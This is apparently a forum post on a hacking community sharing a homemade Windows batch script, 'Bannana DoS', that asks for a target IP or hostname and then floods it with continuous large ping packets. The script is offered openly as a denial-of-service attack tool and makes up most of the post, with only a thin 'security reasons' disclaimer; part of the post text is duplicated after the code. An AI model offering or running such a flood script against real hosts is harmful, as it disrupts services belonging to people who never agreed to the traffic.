Bannana DoS Script 05-13-2014, 05:52 AM
#1
Here is just a simple DoS script I made. This script for a batch file isn't anything big at all, but its where I am going to make my start here on the Hack Community.
Please I do not wan't any hate. If its terrible please give me some options to improve this batch. I intended it to be used for security reasons, but we are all humans.
Give credit where it's due.
Text Image "DoS" cliped and edited from here
Code:
@echo off
title Bannana DoS - Idle
color b
cls
echo.
echo ______ _______ _______
echo -- ( __ \ ( ___ )( ____ \ --
echo -- ( ( \ )( ( ) )( ( \/ --
echo -- ( ) ) )( ) ( )( (_____ --
echo -- ( ) ( )( ) ( )(_____ ) --
echo -- ( ) ) )( ) ( ) ) ) --
echo -- ( (__/ )( (___) )/\____) ) --
echo -- (______/ (_______)\_______) --
echo.
set /p conn=--[IP/DNS]:
echo.
echo Usage: Max 65500
set /p size=--[Packer]:
echo.
echo Usage: IPv4 = 4 , IPv6 = 6
set /p meth=--[Method]:
echo.
echo Usage: Time in milliseconds to wait for each reply.
set /p time=--[Timeout]:
echo.
echo.
title Bannana DoS - Attacking
color c
echo Running Settings on Script.
echo.
ping %conn% -t -l %size% -%meth% -w %time%Please I do not wan't any hate. If its terrible please give me some options to improve this batch. I intended it to be used for security reasons, but we are all humans.
Give credit where it's due.
Text Image "DoS" cliped and edited from here

![[+]](https://sinister.li/images/modern/collapse_collapsed.png)

















